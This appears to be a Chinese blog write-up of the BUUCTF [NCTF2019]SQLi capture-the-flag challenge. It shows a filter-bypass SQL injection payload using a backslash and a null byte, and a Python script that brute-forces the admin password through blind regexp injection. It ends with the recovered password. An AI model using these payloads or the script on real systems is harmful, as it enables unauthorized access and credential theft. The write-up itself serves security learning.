【BUUCTF】[NCTF2019]SQLi

进入题目页面如下

是一个登录界面

尝试万能密码,错误

使用dirsearch目录扫描

发现robots.txt文件

访问robots.txt,发现hint.txt

里面提示了过滤的关键字

下面这行代码的意思是如果 `$_POST'passwd'` 等于管理员的密码, 那么你将获得标志(flag)

根据题目可以得出这是字符型注入,但是 ' 也被过滤

看到过滤了很多关键字,但是转义符好像没过滤,可以利用转义符构成闭合语句

passwd=||/**/1;%00&username=\

得到welcome.php文件

再看过滤了很多函数,但好像没有过滤regexp尝试regexp函数

脚本爆破密码

python 复制代码
import requests
from urllib.parse import unquote
import string

def regexp_guess():
    guessed_result = ""
    possible_characters = string.ascii_lowercase + string.digits + '_'
    target_url = "http://ed141fe7-706a-4558-bb83-02e719516467.node5.buuoj.cn:81/index.php"
    for length in range(1, 100):
        for char in possible_characters:
            current_guess = guessed_result + char
            payload = "||/**/passwd/**/regexp/**/\"^{}\";{}".format(current_guess, unquote('%00'))
            data = {
                "username": "\\",
                "passwd": payload
            }
            response = requests.post(target_url, data=data)
            if "welcome.php" in response.text:
                guessed_result = current_guess
                break
        print(guessed_result)

if __name__ == "__main__":
    regexp_guess()

代码解释

requests 用于发送 HTTP 请求

unquote 用于 URL 解码,string 用于获取特定的字符集合

定义了一个名为 regexp_guess 的函数

guessed_result 用于存储逐步猜测得到的结果,初始为空字符串

定义了可能用于猜测的字符集合,包括小写字母、数字和下划线

发送请求的目标 URL

外层的 for 循环控制猜测结果的长度,从 1 到 100

内层的 for 循环遍历可能的字符

current_guess 是当前正在猜测的字符组合,通过将新字符添加到之前的猜测结果形成

构建 payload ,这是用于发送请求的特定格式的数据

构建 data 字典,包含用户名和密码(即 payload )

使用 requests.post 向目标 URL 发送 POST 请求,并将响应存储在 response 变量中

如果响应包含 "welcome.php" ,说明猜测是正确,更新 guessed_result 跳出内层循环

条件下调用 regexp_guess 函数来执行整个猜测过程

得到密码

you_will_never_know7788990

用密码登录得到flag

最终的得到flag

相关推荐
wbs_scy23 分钟前
仿 muduo 高并发服务器项目:实现 Connection 连接管理模块,并整合 Any 上下文
运维·服务器·网络
熬夜苦读学习42 分钟前
基于websocket的多用户五子棋网页游戏
linux·服务器·网络·websocket·网络协议·游戏·五子棋
沪上企服通43 分钟前
上海地区代账服务供给侧的五种架构形态:从 pipeline SLA 到领域深度的选型笔记
笔记·架构
拥抱太阳06161 小时前
HarmonyOS 应用开发《掌上英语》第14篇:可空类型与安全调用:ArkTS 的非空保障策略
安全
蝶恋舞者2 小时前
Wireshark 抓包工具
网络·测试工具·wireshark
Sirius Wu2 小时前
OpenClaw Observability 并发安全(Per-Request Hook)完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
库玛西2 小时前
深入剖析 Linux 线程机制与分页式存储管理
linux·服务器·c++·笔记
奋发向前wcx2 小时前
y1,y2总复习笔记2 2026.7.15
java·笔记·算法
xywww1682 小时前
AWS 账号安全加固:Root 与 IAM 用户的 MFA 设置实操清单
安全·云计算·aws
苦瓜汤补钙2 小时前
Oracle JDK8 环境配置-Win11
开发语言·数据库·笔记·oracle